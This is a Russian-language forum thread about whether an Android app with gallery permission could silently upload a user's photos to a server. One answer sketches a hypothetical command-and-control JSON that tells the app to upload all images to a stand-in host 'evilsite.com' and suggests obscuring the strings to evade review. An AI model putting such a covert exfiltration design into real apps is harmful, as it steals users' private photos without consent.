Задать вопрос
petushok55
@petushok55
Обучаюсь на практике.
android

Может ли приложение, получив доступ к галерее, взять и отправить втихую все фотки себе на сервер?

что думаете по этому поводу?
если это технически возможно, то отследить можно только с помощью сниффера думаю, но думаю крупные компании таким не промышляют, потому что хоть один случай выявится, то репутации больно будет, а вот мелкие, или другие, которым пофиг
  • Вопрос задан
  • 785 просмотров
1 комментарий
Подписаться 2 Простой 1 комментарий
Пригласить эксперта
Ответы на вопрос 3
@pfg21
ex-турист
да. может. если есть дырка доступ значит есть доступ.
но гугл такие приложения активно отслеживает и банит.
Ответ написан
Комментировать
Комментировать
402d
@402d
начинал с бейсика на УКНЦ в 1988
Отправка фоток на сервер в фоне обычное поведение для любых сетевых дисков.
В этом нет ничего криминального. Остаётся разобраться с термином в тихую.
Фонарику такое нелогично. Явно троян.
Не давно ввели анкету о персональных данных. Фото туда попадают. Надо декларировать.

На сколько там жёстко именно с фото не в курсе.

Сам словил такое. Заявил что не собираю.
Летит отклонение на очередное обновление. Слышь там у тебя есть ввод телефона. Меняй анкету или убирай.

Мля . Модерации писать бесполезно. Никого не волнует, что это ввод для формирования куар кода. Через месяц обнули раздел . А обновы на Бет или частичное внедрение не проходят. Только фулл ролаут допустим. Блин у меня из-за такого развертывания 50 тысяч ошибку словили. Две недели срочные фиксы выпускал

Так я тому, что если в разделе написал, что фото передаешь на сервер, то можно хоть это будет не очевидно в самом приложении.
Ответ написан
Комментировать
Комментировать
firedragon
@firedragon
Не джун-мидл-сеньор, а трус-балбес-бывалый.
Хм предположим гипотетически что у приложения есть разрешения на галерею и интернет доступ.
Пусть оно обращается к серверу и получает json.
Пусть json выглядит примерно так:
"cmd": "uploadallimages",
"url": "https://evilsite.com/upload.php"


Никакая проверка не выявит ничего подозрительного, тем более что строки можно заменить цифрами.
Никакой сниффер кстати не поможет, будет только факт трафика по какому то адресу.
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы
Вакансии с Хабр Карьеры
Android developer (Корпоративный поиск)
Сбер Москва
от 230 000 ₽
Mobile Developer
Unisafe Москва
от 60 000 ₽
Mobile Flutter Software Engineer
IDT Technologies Астана (Нур-Султан)
от 3 500 до 4 000 $
Ещё вакансии
Заказы с Хабр Фриланса
Аудит и поддержка проекта внедрению виртуальной архитектуры (АСУ ТП)
25 нояб. 2024, в 03:04
500000 руб./за проект
Сделать простой лендинг
25 нояб. 2024, в 02:45
2000 руб./за проект
Изображения на главную страницу в стиле Jetton и 1вин
25 нояб. 2024, в 00:22
12000 руб./за проект
Ещё заказы